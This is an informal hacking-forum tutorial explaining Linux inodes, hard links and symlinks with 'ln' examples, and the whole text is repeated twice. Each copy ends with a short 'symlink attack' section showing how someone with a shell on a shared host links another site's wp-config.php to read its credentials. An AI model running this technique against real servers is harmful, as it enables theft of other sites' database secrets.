Pranam to all bhai ji _/\_
Today we will discuss about a most famous as well as dangerous utility Symlink aka Softlink aka symbolic link which is used by hackers to exploit Linux server widely :D
ok , many of us (especially those who are working in security testing domain) familiar with this word.
today we will go through working of Symlink .
As name represent , soft link / symbolic link, symlink is just a shortcut of a file .
in windows OS we create a shortcut of a file which is stored on a drive for example in D: drive in folder having name "data" with name my_file.txt , now we want to access this file from desktop , so we will create shortcut of that file by right clicking on that file and selecting "create shorcut" and shortcut will be created. now copy this shortcut file to desktop and whenever you will click on this file , in actually you are going to open original file which is stored on D: drive in "data" folder .
Linux also provide facility to create shortcut of files but using "SYMLINK"
but before going to symlink concept, i want to explain mechanism of storing files and then representing them by OS
following things needed for file storage and representation of that file in OS
1.storage devics
2.inode number of file
3.and directory entry
storage device, a file is stored in memory block which is known as sector.Then .
The inode number is that which contain information about file like, in which sector file is stored, what is its size,who is the owner of file,what is the file type of file and many more
inode number is unique within a particular file system(partition), that is in a partition we cant have same inode number for 2 files because inode contain info which is required by OS during representation of that file when user ask to access it.
directory entry contains a name for a file or directory and a pointer to the inode where the information about the file or directory is stored.
ok now comes to file Links in linux
Link is an additional directory entry for a file or directory,which allows two or more names for the same thing
there are two type of linking of file in Linux
1.Hard link
2.Soft link(symlink)
Hard Link
A hard link is a directory entry that points to an inode . means if i create a hard link to file my.txt with name ica.txt, this file name will point to inode of file my.txt.
Hard link can only use to link files not to directory.because directory contains two hard links(. for current directory and .. for current directory which contains the number counting of subdirectory in a directory)
Soft Link
a soft link or symbolic link is a directory entry that points to an inode that provides the name of another directory entry. means we have a file my.txt in directory /home/user/ and we want to create soft link to this file in another directory /etc/new with name ica.txt then procedure will be following
Creating Hard link
to create link in linux OS , we have "ln" command .
syntex of creating hard link command is :- ln source_file target_name
example:- i want to create hard link for file my.txt which is stored in /home/user directory to directory /etc/new with name ica .txt
command will be ln /home/user/my.txt /etc/new/ica.txt
if you are already in /etc/new directory you dont need to supply full path to target file
ln /home/user/my.txt ica.txt
and file my.txt will be accessible through file ica.txt
creating Soft link aka Symlink
to create symlink , we will use "ln" command but with option -s (-s show that we want to create link which is soft)
syntex of creating symlink command is :- ln -s source_file_or_directory target_file
example, there is file my.txt in /home/user directory and we want to create symlink to this file in /home directory with name ica.txt , command will be
ln -s /home/user/my.txt /home/ica.txt
so , this is the concept of symlink and hard link .
For Symlink hackers
if you are security tester and have a server whose hosting document root is like this
/usr/hosting/domain/html/
you have shell in directory /usr/hosting/domain/html/hacked/
and you want to hack other website(domain2 with wordpress installation) on server using symlink attack
command will like this to symlink wordpress config file
ln -s /usr/hosting/domain2/html/wp-config.php /usr/hosting/domain/html/hacked/ica.txt
if you are in directory /usr/hosting/domain/html/hacked, then you need not to specify full path for target symlink, just specify your symlink file name (name with which you want to create symlink for source file)
ln -s /usr/hosting/domain2/html/wp-config.php ica.txt
Thank you
Greetz to :- http://mannulinux.blogspot.in/
Today we will discuss about a most famous as well as dangerous utility Symlink aka Softlink aka symbolic link which is used by hackers to exploit Linux server widely :D
ok , many of us (especially those who are working in security testing domain) familiar with this word.
today we will go through working of Symlink .
As name represent , soft link / symbolic link, symlink is just a shortcut of a file .
in windows OS we create a shortcut of a file which is stored on a drive for example in D: drive in folder having name "data" with name my_file.txt , now we want to access this file from desktop , so we will create shortcut of that file by right clicking on that file and selecting "create shorcut" and shortcut will be created. now copy this shortcut file to desktop and whenever you will click on this file , in actually you are going to open original file which is stored on D: drive in "data" folder .
Linux also provide facility to create shortcut of files but using "SYMLINK"
but before going to symlink concept, i want to explain mechanism of storing files and then representing them by OS
following things needed for file storage and representation of that file in OS
1.storage devics
2.inode number of file
3.and directory entry
storage device, a file is stored in memory block which is known as sector.Then .
The inode number is that which contain information about file like, in which sector file is stored, what is its size,who is the owner of file,what is the file type of file and many more
inode number is unique within a particular file system(partition), that is in a partition we cant have same inode number for 2 files because inode contain info which is required by OS during representation of that file when user ask to access it.
directory entry contains a name for a file or directory and a pointer to the inode where the information about the file or directory is stored.
ok now comes to file Links in linux
Link is an additional directory entry for a file or directory,which allows two or more names for the same thing
there are two type of linking of file in Linux
1.Hard link
2.Soft link(symlink)
Hard Link
A hard link is a directory entry that points to an inode . means if i create a hard link to file my.txt with name ica.txt, this file name will point to inode of file my.txt.
Hard link can only use to link files not to directory.because directory contains two hard links(. for current directory and .. for current directory which contains the number counting of subdirectory in a directory)
Soft Link
a soft link or symbolic link is a directory entry that points to an inode that provides the name of another directory entry. means we have a file my.txt in directory /home/user/ and we want to create soft link to this file in another directory /etc/new with name ica.txt then procedure will be following
Creating Hard link
to create link in linux OS , we have "ln" command .
syntex of creating hard link command is :- ln source_file target_name
example:- i want to create hard link for file my.txt which is stored in /home/user directory to directory /etc/new with name ica .txt
command will be ln /home/user/my.txt /etc/new/ica.txt
if you are already in /etc/new directory you dont need to supply full path to target file
ln /home/user/my.txt ica.txt
and file my.txt will be accessible through file ica.txt
creating Soft link aka Symlink
to create symlink , we will use "ln" command but with option -s (-s show that we want to create link which is soft)
syntex of creating symlink command is :- ln -s source_file_or_directory target_file
example, there is file my.txt in /home/user directory and we want to create symlink to this file in /home directory with name ica.txt , command will be
ln -s /home/user/my.txt /home/ica.txt
so , this is the concept of symlink and hard link .
For Symlink hackers
if you are security tester and have a server whose hosting document root is like this
/usr/hosting/domain/html/
you have shell in directory /usr/hosting/domain/html/hacked/
and you want to hack other website(domain2 with wordpress installation) on server using symlink attack
command will like this to symlink wordpress config file
ln -s /usr/hosting/domain2/html/wp-config.php /usr/hosting/domain/html/hacked/ica.txt
if you are in directory /usr/hosting/domain/html/hacked, then you need not to specify full path for target symlink, just specify your symlink file name (name with which you want to create symlink for source file)
ln -s /usr/hosting/domain2/html/wp-config.php ica.txt
Thank you
Greetz to :- http://mannulinux.blogspot.in/
 





